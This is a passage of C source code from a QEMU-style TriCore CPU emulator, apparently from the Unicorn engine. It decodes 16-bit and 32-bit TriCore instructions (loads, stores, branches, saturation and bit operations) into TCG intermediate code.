tcg_ctx->cpu_gpr_a[r2], 2); break; case OPC1_16_SLR_LD_W: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); break; case OPC1_16_SLR_LD_W_POSTINC: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[r2], ctx->mem_idx, MO_LESL); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r2], tcg_ctx->cpu_gpr_a[r2], 4); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sro_opc(DisasContext *ctx, int op1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int r2; int32_t address; r2 = MASK_OP_SRO_S2(ctx->opcode); address = MASK_OP_SRO_OFF4(ctx->opcode); /* SRO-format */ switch (op1) { case OPC1_16_SRO_LD_A: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; case OPC1_16_SRO_LD_BU: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address, MO_UB); break; case OPC1_16_SRO_LD_H: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address, MO_LESW); break; case OPC1_16_SRO_LD_W: gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; case OPC1_16_SRO_ST_A: gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; case OPC1_16_SRO_ST_B: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address, MO_UB); break; case OPC1_16_SRO_ST_H: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address * 2, MO_LESW); break; case OPC1_16_SRO_ST_W: gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[15], tcg_ctx->cpu_gpr_a[r2], address * 4, MO_LESL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sr_system(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; op2 = MASK_OP_SR_OP2(ctx->opcode); switch (op2) { case OPC2_16_SR_NOP: break; case OPC2_16_SR_RET: gen_compute_branch(ctx, op2, 0, 0, 0, 0); break; case OPC2_16_SR_RFE: gen_helper_rfe(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; break; case OPC2_16_SR_DEBUG: /* raise EXCP_DEBUG */ break; case OPC2_16_SR_FRET: gen_fret(ctx); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_sr_accu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1; TCGv temp; r1 = MASK_OP_SR_S1D(ctx->opcode); op2 = MASK_OP_SR_OP2(ctx->opcode); switch (op2) { case OPC2_16_SR_RSUB: /* overflow only if r1 = -0x80000000 */ temp = tcg_const_i32(tcg_ctx, -0x80000000); /* calc V bit */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* sub */ tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1]); /* calc av */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1]); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_PSW_AV); /* calc sav */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free(tcg_ctx, temp); break; case OPC2_16_SR_SAT_B: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0x7f, -0x80); break; case OPC2_16_SR_SAT_BU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0xff); break; case OPC2_16_SR_SAT_H: gen_saturate(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0x7fff, -0x8000); break; case OPC2_16_SR_SAT_HU: gen_saturate_u(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 0xffff); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_16Bit_opc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int op1; int r1, r2; int32_t const16; int32_t address; TCGv temp; op1 = MASK_OP_MAJOR(ctx->opcode); /* handle ADDSC.A opcode only being 6 bit long */ if (unlikely((op1 & 0x3f) == OPC1_16_SRRS_ADDSC_A)) { op1 = OPC1_16_SRRS_ADDSC_A; } switch (op1) { case OPC1_16_SRC_ADD: case OPC1_16_SRC_ADD_A15: case OPC1_16_SRC_ADD_15A: case OPC1_16_SRC_ADD_A: case OPC1_16_SRC_CADD: case OPC1_16_SRC_CADDN: case OPC1_16_SRC_CMOV: case OPC1_16_SRC_CMOVN: case OPC1_16_SRC_EQ: case OPC1_16_SRC_LT: case OPC1_16_SRC_MOV: case OPC1_16_SRC_MOV_A: case OPC1_16_SRC_MOV_E: case OPC1_16_SRC_SH: case OPC1_16_SRC_SHA: decode_src_opc(ctx, op1); break; /* SRR-format */ case OPC1_16_SRR_ADD: case OPC1_16_SRR_ADD_A15: case OPC1_16_SRR_ADD_15A: case OPC1_16_SRR_ADD_A: case OPC1_16_SRR_ADDS: case OPC1_16_SRR_AND: case OPC1_16_SRR_CMOV: case OPC1_16_SRR_CMOVN: case OPC1_16_SRR_EQ: case OPC1_16_SRR_LT: case OPC1_16_SRR_MOV: case OPC1_16_SRR_MOV_A: case OPC1_16_SRR_MOV_AA: case OPC1_16_SRR_MOV_D: case OPC1_16_SRR_MUL: case OPC1_16_SRR_OR: case OPC1_16_SRR_SUB: case OPC1_16_SRR_SUB_A15B: case OPC1_16_SRR_SUB_15AB: case OPC1_16_SRR_SUBS: case OPC1_16_SRR_XOR: decode_srr_opc(ctx, op1); break; /* SSR-format */ case OPC1_16_SSR_ST_A: case OPC1_16_SSR_ST_A_POSTINC: case OPC1_16_SSR_ST_B: case OPC1_16_SSR_ST_B_POSTINC: case OPC1_16_SSR_ST_H: case OPC1_16_SSR_ST_H_POSTINC: case OPC1_16_SSR_ST_W: case OPC1_16_SSR_ST_W_POSTINC: decode_ssr_opc(ctx, op1); break; /* SRRS-format */ case OPC1_16_SRRS_ADDSC_A: r2 = MASK_OP_SRRS_S2(ctx->opcode); r1 = MASK_OP_SRRS_S1D(ctx->opcode); const16 = MASK_OP_SRRS_N(ctx->opcode); temp = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[15], const16); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[r2], temp); tcg_temp_free(tcg_ctx, temp); break; /* SLRO-format */ case OPC1_16_SLRO_LD_A: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; case OPC1_16_SLRO_LD_BU: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16, MO_UB); break; case OPC1_16_SLRO_LD_H: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 2, MO_LESW); break; case OPC1_16_SLRO_LD_W: r1 = MASK_OP_SLRO_D(ctx->opcode); const16 = MASK_OP_SLRO_OFF4(ctx->opcode); gen_offset_ld(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; /* SB-format */ case OPC1_16_SB_CALL: case OPC1_16_SB_J: case OPC1_16_SB_JNZ: case OPC1_16_SB_JZ: address = MASK_OP_SB_DISP8_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, 0, address); break; /* SBC-format */ case OPC1_16_SBC_JEQ: case OPC1_16_SBC_JNE: address = MASK_OP_SBC_DISP4(ctx->opcode); const16 = MASK_OP_SBC_CONST4_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, const16, address); break; case OPC1_16_SBC_JEQ2: case OPC1_16_SBC_JNE2: if (has_feature(ctx, TRICORE_FEATURE_16)) { address = MASK_OP_SBC_DISP4(ctx->opcode); const16 = MASK_OP_SBC_CONST4_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, const16, address); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; /* SBRN-format */ case OPC1_16_SBRN_JNZ_T: case OPC1_16_SBRN_JZ_T: address = MASK_OP_SBRN_DISP4(ctx->opcode); const16 = MASK_OP_SBRN_N(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, const16, address); break; /* SBR-format */ case OPC1_16_SBR_JEQ2: case OPC1_16_SBR_JNE2: if (has_feature(ctx, TRICORE_FEATURE_16)) { r1 = MASK_OP_SBR_S2(ctx->opcode); address = MASK_OP_SBR_DISP4(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, address); } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC1_16_SBR_JEQ: case OPC1_16_SBR_JGEZ: case OPC1_16_SBR_JGTZ: case OPC1_16_SBR_JLEZ: case OPC1_16_SBR_JLTZ: case OPC1_16_SBR_JNE: case OPC1_16_SBR_JNZ: case OPC1_16_SBR_JNZ_A: case OPC1_16_SBR_JZ: case OPC1_16_SBR_JZ_A: case OPC1_16_SBR_LOOP: r1 = MASK_OP_SBR_S2(ctx->opcode); address = MASK_OP_SBR_DISP4(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, address); break; /* SC-format */ case OPC1_16_SC_AND: case OPC1_16_SC_BISR: case OPC1_16_SC_LD_A: case OPC1_16_SC_LD_W: case OPC1_16_SC_MOV: case OPC1_16_SC_OR: case OPC1_16_SC_ST_A: case OPC1_16_SC_ST_W: case OPC1_16_SC_SUB_A: decode_sc_opc(ctx, op1); break; /* SLR-format */ case OPC1_16_SLR_LD_A: case OPC1_16_SLR_LD_A_POSTINC: case OPC1_16_SLR_LD_BU: case OPC1_16_SLR_LD_BU_POSTINC: case OPC1_16_SLR_LD_H: case OPC1_16_SLR_LD_H_POSTINC: case OPC1_16_SLR_LD_W: case OPC1_16_SLR_LD_W_POSTINC: decode_slr_opc(ctx, op1); break; /* SRO-format */ case OPC1_16_SRO_LD_A: case OPC1_16_SRO_LD_BU: case OPC1_16_SRO_LD_H: case OPC1_16_SRO_LD_W: case OPC1_16_SRO_ST_A: case OPC1_16_SRO_ST_B: case OPC1_16_SRO_ST_H: case OPC1_16_SRO_ST_W: decode_sro_opc(ctx, op1); break; /* SSRO-format */ case OPC1_16_SSRO_ST_A: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_a[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; case OPC1_16_SSRO_ST_B: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16, MO_UB); break; case OPC1_16_SSRO_ST_H: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 2, MO_LESW); break; case OPC1_16_SSRO_ST_W: r1 = MASK_OP_SSRO_S1(ctx->opcode); const16 = MASK_OP_SSRO_OFF4(ctx->opcode); gen_offset_st(ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_a[15], const16 * 4, MO_LESL); break; /* SR-format */ case OPCM_16_SR_SYSTEM: decode_sr_system(ctx); break; case OPCM_16_SR_ACCU: decode_sr_accu(ctx); break; case OPC1_16_SR_JI: r1 = MASK_OP_SR_S1D(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, 0); break; case OPC1_16_SR_NOT: r1 = MASK_OP_SR_S1D(ctx->opcode); tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1]); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* * 32 bit instructions */ /* ABS-format */ static void decode_abs_ldw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_LD_A: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp, ctx->mem_idx, MO_LESL); break; case OPC2_32_ABS_LD_D: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_ABS_LD_DA: CHECK_REG_PAIR(r1); gen_ld_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); break; case OPC2_32_ABS_LD_W: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LESL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_ldb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_LD_B: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_SB); break; case OPC2_32_ABS_LD_BU: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_UB); break; case OPC2_32_ABS_LD_H: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LESW); break; case OPC2_32_ABS_LD_HU: tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUW); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_ldst_swap(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_LDMST: gen_ldmst(ctx, r1, temp); break; case OPC2_32_ABS_SWAP_W: gen_swap(ctx, r1, temp); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_ldst_context(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int32_t off18; off18 = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); switch (op2) { case OPC2_32_ABS_LDLCX: gen_helper_1arg(tcg_ctx, ldlcx, EA_ABS_FORMAT(off18)); break; case OPC2_32_ABS_LDUCX: gen_helper_1arg(tcg_ctx, lducx, EA_ABS_FORMAT(off18)); break; case OPC2_32_ABS_STLCX: gen_helper_1arg(tcg_ctx, stlcx, EA_ABS_FORMAT(off18)); break; case OPC2_32_ABS_STUCX: gen_helper_1arg(tcg_ctx, stucx, EA_ABS_FORMAT(off18)); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_abs_store(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_ST_A: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], temp, ctx->mem_idx, MO_LESL); break; case OPC2_32_ABS_ST_D: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_d[r1+1], tcg_ctx->cpu_gpr_d[r1], temp); break; case OPC2_32_ABS_ST_DA: CHECK_REG_PAIR(r1); gen_st_2regs_64(ctx, tcg_ctx->cpu_gpr_a[r1+1], tcg_ctx->cpu_gpr_a[r1], temp); break; case OPC2_32_ABS_ST_W: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LESL); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } static void decode_abs_storeb_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t op2; int32_t r1; uint32_t address; TCGv temp; r1 = MASK_OP_ABS_S1D(ctx->opcode); address = MASK_OP_ABS_OFF18(ctx->opcode); op2 = MASK_OP_ABS_OP2(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); switch (op2) { case OPC2_32_ABS_ST_B: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_UB); break; case OPC2_32_ABS_ST_H: tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUW); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } /* Bit-format */ static void decode_bit_andacc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); op2 = MASK_OP_BIT_OP2(ctx->opcode); switch (op2) { case OPC2_32_BIT_AND_AND_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl, &tcg_gen_and_tl); break; case OPC2_32_BIT_AND_ANDN_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl, &tcg_gen_and_tl); break; case OPC2_32_BIT_AND_NOR_T: if (TCG_TARGET_HAS_andc_i32) { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_andc_tl); } else { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl, &tcg_gen_and_tl); } break; case OPC2_32_BIT_AND_OR_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_and_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_logical_t(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); op2 = MASK_OP_BIT_OP2(ctx->opcode); switch (op2) { case OPC2_32_BIT_AND_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl); break; case OPC2_32_BIT_ANDN_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl); break; case OPC2_32_BIT_NOR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl); break; case OPC2_32_BIT_OR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; TCGv temp; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], pos2); if (op2 == OPC2_32_BIT_INSN_T) { tcg_gen_not_tl(tcg_ctx, temp, temp); } tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, pos1, 1); tcg_temp_free(tcg_ctx, temp); } static void decode_bit_logical_t2(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); switch (op2) { case OPC2_32_BIT_NAND_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nand_tl); break; case OPC2_32_BIT_ORN_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_orc_tl); break; case OPC2_32_BIT_XNOR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_eqv_tl); break; case OPC2_32_BIT_XOR_T: gen_bit_1op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_xor_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_orand(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); switch (op2) { case OPC2_32_BIT_OR_AND_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl, &tcg_gen_or_tl); break; case OPC2_32_BIT_OR_ANDN_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl, &tcg_gen_or_tl); break; case OPC2_32_BIT_OR_NOR_T: if (TCG_TARGET_HAS_orc_i32) { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_orc_tl); } else { gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl, &tcg_gen_or_tl); } break; case OPC2_32_BIT_OR_OR_T: gen_bit_2op(ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl, &tcg_gen_or_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_bit_sh_logic1(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; TCGv temp; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = MASK_OP_BIT_POS1(ctx->opcode); pos2 = MASK_OP_BIT_POS2(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_BIT_SH_AND_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_and_tl); break; case OPC2_32_BIT_SH_ANDN_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_andc_tl); break; case OPC2_32_BIT_SH_NOR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_nor_tl); break; case OPC2_32_BIT_SH_OR_T: gen_bit_1op(ctx, temp, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], pos1, pos2, &tcg_gen_or_tl); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], 1); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], temp); tcg_temp_free(tcg_ctx, temp); } static void decode_bit_sh_logic2(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3; int pos1, pos2; TCGv temp; op2 = MASK_OP_BIT_OP2(ctx->opcode); r1 = MASK_OP_BIT_S1(ctx->opcode); r2 = MASK_OP_BIT_S2(ctx->opcode); r3 = MASK_OP_BIT_D(ctx->opcode); pos1 = 